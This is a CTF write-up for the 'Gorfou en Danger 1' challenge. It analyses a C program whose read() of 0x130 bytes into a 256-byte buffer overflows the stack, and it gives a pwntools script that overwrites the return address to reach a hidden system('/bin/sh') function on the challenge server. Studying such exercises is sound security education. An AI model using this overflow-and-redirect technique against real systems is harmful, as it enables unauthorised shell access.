404 CTF 2025 - Gorfou en Danger 1
Challenge Analysis
This challenge is a classic example of a buffer overflow with execution redirection. Here are the key points:
- In the
take_command()function, the program uses a buffer of 256 bytes (0x100):
void take_command() {
char command[0x100];
// ...
}- The call to
read()reads up to 304 bytes (0x130), creating an overflow of 48 bytes:
read(0, command, 0x130);This overflow allows overwriting the return address on the stack.
- A function
debug_access()exists in the program but is never called naturally. This function executes a shell:
void debug_access(void) {
puts("Accès à l'interface de debogage...");
__asm__(
".intel_syntax noprefix;"
"push 0x0;"
".att_syntax;"
);
system("/bin/sh");
return;
}- The main function sets up the environment and repeatedly calls
take_command()in an infinite loop:
int main(void) {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
menu();
printf("Terminal de contrôle à distance de la base martienne Fermat\n");
while (1) {
take_command();
}
return 0;
}Exploitation
The strategy was to:
- Fill the buffer with arbitrary characters
- Overwrite the return address with the address of the
debug_access()function - Obtain a shell and retrieve the flag
The payload:
- 264 bytes of padding (256 for the buffer + 8 for the old rbp)
- Address of
debug_access()(0x4004fd)
Exploit Code
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
context.log_level = 'info'
p = remote('challenges.404ctf.fr', 32462)
debug_addr = 0x4004fd
padding = b'A' * 264
payload = padding + p64(debug_addr)
p.recvuntil(b'> ')
p.sendline(payload)
p.interactive()Once the shell is obtained, you can run cat flag.txt to retrieve the flag.